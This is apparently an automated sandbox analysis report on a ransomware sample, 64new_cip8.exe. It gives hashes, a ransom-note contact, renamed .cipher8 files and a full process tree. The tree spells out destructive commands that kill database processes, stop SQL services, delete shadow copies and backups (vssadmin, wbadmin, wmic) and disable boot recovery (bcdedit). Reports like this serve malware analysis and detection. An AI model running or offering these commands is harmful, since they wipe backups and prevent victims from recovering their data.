Resubmissions
29-11-2022 11:01
221129-m4n2rafd8v 10Analysis
-
max time kernel
145s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 11:01
Static task
static1
Behavioral task
behavioral1
Sample
64new_cip8.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
64new_cip8.exe
Resource
win10v2004-20220812-en
General
-
Target
64new_cip8.exe
-
Size
309KB
-
MD5
681ba901bb6deb49ecdc83c9e5dcc548
-
SHA1
5553534db3d538adab933a74e1399357616cfe4f
-
SHA256
c66ba850b29e7d9302621a209882a0f86bdd158faba936c7a045d82c3669bcd0
-
SHA512
5d0d01b68f82e96e5d872043d9274b16f4b83a7998136deb20c1d4c2e4c5be298cc786e4ae17ad7b587538ec963cc70443836a60132c000f010beb69d008fb50
-
SSDEEP
6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l003WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++38aw7c
Malware Config
Extracted
\??\A:\!-Recovery_Instructions-!.html
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
64new_cip8.exedescription pid process target process PID 1568 created 2616 1568 64new_cip8.exe Explorer.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 224 bcdedit.exe 4296 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 4688 wbadmin.exe 3324 wbadmin.exe -
Processes:
wbadmin.exepid process 4384 wbadmin.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
64new_cip8.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConvertFromRedo.crw => C:\Users\Admin\Pictures\ConvertFromRedo.crw.cipher8 64new_cip8.exe File opened for modification C:\Users\Admin\Pictures\ImportRedo.tiff 64new_cip8.exe File renamed C:\Users\Admin\Pictures\ImportRedo.tiff => C:\Users\Admin\Pictures\ImportRedo.tiff.cipher8 64new_cip8.exe File renamed C:\Users\Admin\Pictures\UnregisterGroup.tif => C:\Users\Admin\Pictures\UnregisterGroup.tif.cipher8 64new_cip8.exe File renamed C:\Users\Admin\Pictures\ConfirmPush.tif => C:\Users\Admin\Pictures\ConfirmPush.tif.cipher8 64new_cip8.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
64new_cip8.exedescription ioc process File opened (read-only) \??\B: 64new_cip8.exe File opened (read-only) \??\G: 64new_cip8.exe File opened (read-only) \??\J: 64new_cip8.exe File opened (read-only) \??\L: 64new_cip8.exe File opened (read-only) \??\T: 64new_cip8.exe File opened (read-only) \??\W: 64new_cip8.exe File opened (read-only) \??\X: 64new_cip8.exe File opened (read-only) \??\S: 64new_cip8.exe File opened (read-only) \??\U: 64new_cip8.exe File opened (read-only) \??\F: 64new_cip8.exe File opened (read-only) \??\H: 64new_cip8.exe File opened (read-only) \??\I: 64new_cip8.exe File opened (read-only) \??\M: 64new_cip8.exe File opened (read-only) \??\P: 64new_cip8.exe File opened (read-only) \??\R: 64new_cip8.exe File opened (read-only) \??\V: 64new_cip8.exe File opened (read-only) \??\Z: 64new_cip8.exe File opened (read-only) \??\Y: 64new_cip8.exe File opened (read-only) \??\A: 64new_cip8.exe File opened (read-only) \??\E: 64new_cip8.exe File opened (read-only) \??\K: 64new_cip8.exe File opened (read-only) \??\N: 64new_cip8.exe File opened (read-only) \??\O: 64new_cip8.exe File opened (read-only) \??\Q: 64new_cip8.exe -
Drops file in Windows directory 3 IoCs
Processes:
wbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 1792 2616 WerFault.exe Explorer.EXE 440 4020 WerFault.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2680 vssadmin.exe -
Kills process with taskkill 16 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4892 taskkill.exe 4460 taskkill.exe 3428 taskkill.exe 608 taskkill.exe 5072 taskkill.exe 3104 taskkill.exe 3588 taskkill.exe 2860 taskkill.exe 2784 taskkill.exe 2044 taskkill.exe 5092 taskkill.exe 4748 taskkill.exe 604 taskkill.exe 220 taskkill.exe 4072 taskkill.exe 860 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{AFF1FE51-F87C-449A-A316-9872D9D800F6} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
64new_cip8.exepid process 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe 1568 64new_cip8.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeWMIC.exewbengine.exeexplorer.exedescription pid process Token: SeDebugPrivilege 4748 taskkill.exe Token: SeDebugPrivilege 4892 taskkill.exe Token: SeDebugPrivilege 2044 taskkill.exe Token: SeDebugPrivilege 604 taskkill.exe Token: SeDebugPrivilege 220 taskkill.exe Token: SeDebugPrivilege 4072 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 3104 taskkill.exe Token: SeDebugPrivilege 860 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 3428 taskkill.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 5092 taskkill.exe Token: SeDebugPrivilege 608 taskkill.exe Token: SeDebugPrivilege 2784 taskkill.exe Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeIncreaseQuotaPrivilege 400 WMIC.exe Token: SeSecurityPrivilege 400 WMIC.exe Token: SeTakeOwnershipPrivilege 400 WMIC.exe Token: SeLoadDriverPrivilege 400 WMIC.exe Token: SeSystemProfilePrivilege 400 WMIC.exe Token: SeSystemtimePrivilege 400 WMIC.exe Token: SeProfSingleProcessPrivilege 400 WMIC.exe Token: SeIncBasePriorityPrivilege 400 WMIC.exe Token: SeCreatePagefilePrivilege 400 WMIC.exe Token: SeBackupPrivilege 400 WMIC.exe Token: SeRestorePrivilege 400 WMIC.exe Token: SeShutdownPrivilege 400 WMIC.exe Token: SeDebugPrivilege 400 WMIC.exe Token: SeSystemEnvironmentPrivilege 400 WMIC.exe Token: SeRemoteShutdownPrivilege 400 WMIC.exe Token: SeUndockPrivilege 400 WMIC.exe Token: SeManageVolumePrivilege 400 WMIC.exe Token: 33 400 WMIC.exe Token: 34 400 WMIC.exe Token: 35 400 WMIC.exe Token: 36 400 WMIC.exe Token: SeBackupPrivilege 4692 wbengine.exe Token: SeRestorePrivilege 4692 wbengine.exe Token: SeSecurityPrivilege 4692 wbengine.exe Token: SeShutdownPrivilege 512 explorer.exe Token: SeCreatePagefilePrivilege 512 explorer.exe Token: SeShutdownPrivilege 512 explorer.exe Token: SeCreatePagefilePrivilege 512 explorer.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
explorer.exepid process 512 explorer.exe 512 explorer.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
explorer.exepid process 512 explorer.exe 512 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
64new_cip8.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1568 wrote to memory of 4200 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4200 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4200 1568 64new_cip8.exe cmd.exe PID 4200 wrote to memory of 2084 4200 cmd.exe cmd.exe PID 4200 wrote to memory of 2084 4200 cmd.exe cmd.exe PID 1568 wrote to memory of 3932 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 3932 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 3932 1568 64new_cip8.exe cmd.exe PID 3932 wrote to memory of 1528 3932 cmd.exe cmd.exe PID 3932 wrote to memory of 1528 3932 cmd.exe cmd.exe PID 1528 wrote to memory of 4748 1528 cmd.exe taskkill.exe PID 1528 wrote to memory of 4748 1528 cmd.exe taskkill.exe PID 1568 wrote to memory of 4724 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4724 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4724 1568 64new_cip8.exe cmd.exe PID 4724 wrote to memory of 3760 4724 cmd.exe cmd.exe PID 4724 wrote to memory of 3760 4724 cmd.exe cmd.exe PID 3760 wrote to memory of 4892 3760 cmd.exe taskkill.exe PID 3760 wrote to memory of 4892 3760 cmd.exe taskkill.exe PID 1568 wrote to memory of 4160 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4160 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 4160 1568 64new_cip8.exe cmd.exe PID 4160 wrote to memory of 1324 4160 cmd.exe cmd.exe PID 4160 wrote to memory of 1324 4160 cmd.exe cmd.exe PID 1324 wrote to memory of 2044 1324 cmd.exe taskkill.exe PID 1324 wrote to memory of 2044 1324 cmd.exe taskkill.exe PID 1568 wrote to memory of 664 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 664 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 664 1568 64new_cip8.exe cmd.exe PID 664 wrote to memory of 2016 664 cmd.exe cmd.exe PID 664 wrote to memory of 2016 664 cmd.exe cmd.exe PID 2016 wrote to memory of 604 2016 cmd.exe taskkill.exe PID 2016 wrote to memory of 604 2016 cmd.exe taskkill.exe PID 1568 wrote to memory of 1644 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 1644 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 1644 1568 64new_cip8.exe cmd.exe PID 1644 wrote to memory of 240 1644 cmd.exe cmd.exe PID 1644 wrote to memory of 240 1644 cmd.exe cmd.exe PID 240 wrote to memory of 220 240 cmd.exe taskkill.exe PID 240 wrote to memory of 220 240 cmd.exe taskkill.exe PID 1568 wrote to memory of 2644 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 2644 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 2644 1568 64new_cip8.exe cmd.exe PID 2644 wrote to memory of 4240 2644 cmd.exe cmd.exe PID 2644 wrote to memory of 4240 2644 cmd.exe cmd.exe PID 4240 wrote to memory of 4072 4240 cmd.exe taskkill.exe PID 4240 wrote to memory of 4072 4240 cmd.exe taskkill.exe PID 1568 wrote to memory of 1844 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 1844 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 1844 1568 64new_cip8.exe cmd.exe PID 1844 wrote to memory of 3840 1844 cmd.exe cmd.exe PID 1844 wrote to memory of 3840 1844 cmd.exe cmd.exe PID 3840 wrote to memory of 4460 3840 cmd.exe taskkill.exe PID 3840 wrote to memory of 4460 3840 cmd.exe taskkill.exe PID 1568 wrote to memory of 2176 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 2176 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 2176 1568 64new_cip8.exe cmd.exe PID 2176 wrote to memory of 2156 2176 cmd.exe cmd.exe PID 2176 wrote to memory of 2156 2176 cmd.exe cmd.exe PID 2156 wrote to memory of 5072 2156 cmd.exe taskkill.exe PID 2156 wrote to memory of 5072 2156 cmd.exe taskkill.exe PID 1568 wrote to memory of 3440 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 3440 1568 64new_cip8.exe cmd.exe PID 1568 wrote to memory of 3440 1568 64new_cip8.exe cmd.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
64new_cip8.exe64new_cip8.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 64new_cip8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 64new_cip8.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe"C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c rem Kill "SQL"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlbrowser.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlwriter.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im msmdsrv.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im MsDtsSrvr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlceip.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im SQLAGENT.EXE5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdhost.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im sqlservr.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im ReportingServicesService.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im pg_ctl.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe4⤵
-
C:\Windows\system32\taskkill.exetaskkill -f -im postgres.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1004⤵
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1005⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1006⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW4⤵
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW4⤵
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser4⤵
-
C:\Windows\system32\net.exenet stop SQLBrowser5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS4⤵
-
C:\Windows\system32\net.exenet stop ReportServer$ISARS5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$ISARS6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter4⤵
-
C:\Windows\system32\net.exenet stop SQLWriter5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet4⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet4⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersions:0 -quiet5⤵
- Deletes system backups
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP5⤵
- Deletes System State backups
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
